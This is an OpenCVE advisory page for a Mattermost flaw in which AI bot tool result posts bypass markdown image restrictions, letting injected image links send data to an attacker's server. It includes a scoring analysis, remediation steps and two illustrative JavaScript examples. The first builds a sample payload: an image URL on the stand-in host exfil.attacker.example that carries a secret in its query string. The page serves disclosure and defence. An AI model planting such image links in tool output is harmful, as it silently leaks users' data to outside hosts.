Description
Mattermost versions 10.11.x <= 10.11.18, 11.6.x <= 11.6.3, 11.5.x <= 11.5.6 fail to properly apply markdown image rendering restrictions to AI bot tool result posts, which allows an authenticated attacker to exfiltrate data to an attacker-controlled server via injecting markdown image syntax into tool result content rendered by a victim's client. Mattermost Advisory ID: MMSA-2026-00619
Published: 2026-06-26
Score: 3.5 Low
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The affected Mattermost releases do not enforce the markdown image rendering restrictions on posts that carry AI bot tool results. An authenticated attacker who can inject markdown image syntax into tool result content can point the image URL at a server they control; when a victim's client renders the post it requests that image, and whatever the attacker placed in the URL (typically data the tool had access to, encoded in the query string) is delivered to the attacker's server with the request. This is a data exfiltration vector, not a code execution issue, and it is classified under CWE-693, Protection Mechanism Failure: the rendering restriction exists but is not applied to this post type.

Affected Systems

The affected releases are Mattermost 10.11.x up to and including 10.11.18, 11.6.x up to and including 11.6.3, and 11.5.x up to and including 11.5.6. Exploitation requires an authenticated account on the instance, and the flaw is only reachable where the AI bot functionality that produces tool result posts is in use.

Risk and Exploitability

The CVSS 3.1 base score is 3.5 (Low), vector AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N: reachable over the network with low attack complexity, low privileges (any authenticated account), user interaction required (a victim's client has to render the post), unchanged scope, and a limited confidentiality impact only. No EPSS score is available and the CVE is not in CISA KEV; the SSVC assessment recorded on this page lists Exploitation: none, Automatable: no and Technical Impact: partial. The attack path is: an authenticated attacker gets image markdown into a bot tool result, a victim views the post, and the victim's client issues an outbound HTTP request to the attacker's host. The severity is low, but the outcome is silent data leakage that the victim is unlikely to notice, so it deserves attention on instances where AI bot tool results can include attacker-influenced content.

Generated by OpenCVE AI on June 26, 2026 at 16:25 UTC.
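The rendering behaviour described above, as an added example that is not part of the original page or of Mattermost's own code. It models a minimal markdown image renderer, a post shape with a fromBot flag and a tool_result type, and the hostnames chat.example.internal and exfil.attacker.example; all of these, and the secret value, are constructed for illustration. It shows which host a client would contact when a bot tool result containing attacker-supplied image syntax is rendered without restriction, and how an origin allowlist applied only to tool result posts removes that request.

```javascript
// Added example, not code from Mattermost or its AI plugin. It models why a
// markdown image in an AI bot tool result post is an exfiltration primitive
// and what an "image rendering restriction" on such posts has to do.
// Everything here is constructed: the renderer, the post shape, the
// hostnames (chat.example.internal, exfil.attacker.example) and the secret.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Minimal HTML escaping so untrusted text cannot break out of attributes.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Markdown image syntax: ![alt](url) with an optional "title".
const IMAGE_RE = /!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)/g;

// Unrestricted rendering: every image URL becomes an <img>, so the client
// fetches it as soon as the post is displayed. Data placed in the URL by
// whoever authored the tool result travels to that host with the request.
function renderUnrestricted(message) {
  return message.replace(IMAGE_RE, (_m, alt, url) =>
    `<img alt="${escapeHtml(alt)}" src="${escapeHtml(url)}">`);
}

// Restricted rendering for bot tool-result posts: an image is rendered only
// when its URL is an absolute URL on an allowlisted origin (here, the chat
// server itself); anything else is shown as inert text, so no request is
// issued. Relative URLs are treated as not allowed, a simplification of
// this example.
function renderToolResult(post, allowedOrigins) {
  if (!(post.fromBot && post.type === "tool_result")) {
    return renderUnrestricted(post.message);
  }
  return post.message.replace(IMAGE_RE, (match, alt, url) => {
    let origin;
    try { origin = new URL(url).origin; } catch { origin = null; }
    if (origin && allowedOrigins.has(origin)) {
      return `<img alt="${escapeHtml(alt)}" src="${escapeHtml(url)}">`;
    }
    return escapeHtml(match); // neutralised: literal text, no <img>
  });
}

// Hosts a browser would contact to load the <img> tags in rendered HTML.
function imageHosts(html) {
  const hosts = [];
  for (const m of html.matchAll(/<img [^>]*src="([^"]+)"/g)) {
    hosts.push(new URL(m[1].replace(/&amp;/g, "&")).host);
  }
  return hosts;
}

// Constructed scenario: the tool result the bot posts contains content the
// attacker controls, with an image whose query string carries data the tool
// had access to.
const secret = "channel export token 0xdeadbeef"; // made up for the example
const attackerPayload = "Summary of the page.\n" +
  `![](https://exfil.attacker.example/c?d=${encodeURIComponent(secret)})`;

const toolResultPost = { fromBot: true, type: "tool_result", message: attackerPayload };
const allowedOrigins = new Set(["https://chat.example.internal"]);

// Compare the hosts contacted by the unrestricted and the restricted renderer.
function demo() {
  return {
    vulnerable: imageHosts(renderUnrestricted(toolResultPost.message)),
    fixed: imageHosts(renderToolResult(toolResultPost, allowedOrigins)),
  };
}

console.log(demo()); // vulnerable: ["exfil.attacker.example"], fixed: []
```

The point of the allowlist is that the restriction is keyed on the post type, not on the content: a tool result is untrusted by construction, so the renderer decides where images may come from before any markup in the message is honoured.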

Remediation

Vendor Solution

Update Mattermost to versions 11.7.0, 10.11.19, 11.6.4, 11.5.7 or higher.
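An added helper, not Mattermost's own code, that decides from a version string whether a server falls inside the affected ranges listed on this page. The patched floor for each branch is taken from the vendor solution above; versions on branches the advisory does not mention are reported as "not listed" rather than as safe, because the page says nothing about them. The branch table, the function names and the handling of an optional "v" prefix are assumptions of this example.

```javascript
// Added example, not Mattermost code: classify a server version against the
// ranges in MMSA-2026-00619 as stated on this page.
// Patched floor per affected branch, from the vendor solution above.
const PATCHED = { "10.11": [10, 11, 19], "11.5": [11, 5, 7], "11.6": [11, 6, 4] };
// 11.7.0 and later is listed as fixed.
const FIXED_FROM = [11, 7, 0];

// Parse "MAJOR.MINOR.PATCH", tolerating a leading "v" and trailing suffixes.
function parseVersion(s) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(s.trim());
  if (!m) throw new Error(`unrecognised version string: ${s}`);
  return m.slice(1, 4).map(Number);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// Returns "affected", "patched" or "not listed".
function assess(versionString) {
  const v = parseVersion(versionString);
  const branch = `${v[0]}.${v[1]}`;
  if (branch in PATCHED) {
    return compareVersions(v, PATCHED[branch]) < 0 ? "affected" : "patched";
  }
  if (compareVersions(v, FIXED_FROM) >= 0) return "patched";
  // Older branches are outside the advisory's stated ranges: no claim either way.
  return "not listed";
}

for (const v of ["10.11.18", "10.11.19", "11.6.3", "11.5.7", "11.7.2", "v11.4.2"]) {
  console.log(v, assess(v));
}
```

Feed it the version the server reports; a "not listed" result means the advisory does not cover that branch, which on an out-of-support release is a reason to upgrade, not a reason to relax.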


OpenCVE Recommended Actions

  • Upgrade Mattermost to a patched release (10.11.19, 11.5.7, 11.6.4, 11.7.0 or later).
  • If an upgrade is not yet possible, disable the AI bot functionality that produces tool result posts, or otherwise prevent image rendering for those posts, until the upgrade is done.
  • Restricting the hosts that client browsers and desktop apps may load images from (at the network or browser policy layer) limits exposure. Routing images through a server-side image proxy does not prevent the leak, since the proxy still requests the attacker's URL, including the data in it, on the client's behalf.

Generated by OpenCVE AI on June 26, 2026 at 16:25 UTC.

Advisories

No advisories yet.

History

Fri, 26 Jun 2026 19:15:00 +0000

Type                  Values Removed   Values Added
First Time appeared                    Mattermost
                                       Mattermost mattermost
Vendors & Products                     Mattermost
                                       Mattermost mattermost

Fri, 26 Jun 2026 16:30:00 +0000

Type      Values Removed   Values Added
Metrics                    ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Fri, 26 Jun 2026 15:15:00 +0000

Type         Values Removed   Values Added
Description                   Mattermost versions 10.11.x <= 10.11.18, 11.6.x <= 11.6.3, 11.5.x <= 11.5.6 fail to properly apply markdown image rendering restrictions to AI bot tool result posts, which allows an authenticated attacker to exfiltrate data to an attacker-controlled server via injecting markdown image syntax into tool result content rendered by a victim's client. Mattermost Advisory ID: MMSA-2026-00619
Title                         Markdown image rendering bypass in AI bot tool result posts in Mattermost
Weaknesses                    CWE-693
References
Metrics                       cvssV3_1 {'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}

MITRE

Status: PUBLISHED

Assigner: Mattermost

Published:

Updated: 2026-06-26T15:41:09.780Z

Reserved: 2026-03-03T11:25:53.785Z

Link: CVE-2026-3472

Vulnrichment

Updated: 2026-06-26T15:41:06.401Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-26T19:00:04Z

Weaknesses
  • CWE-693

    Protection Mechanism Failure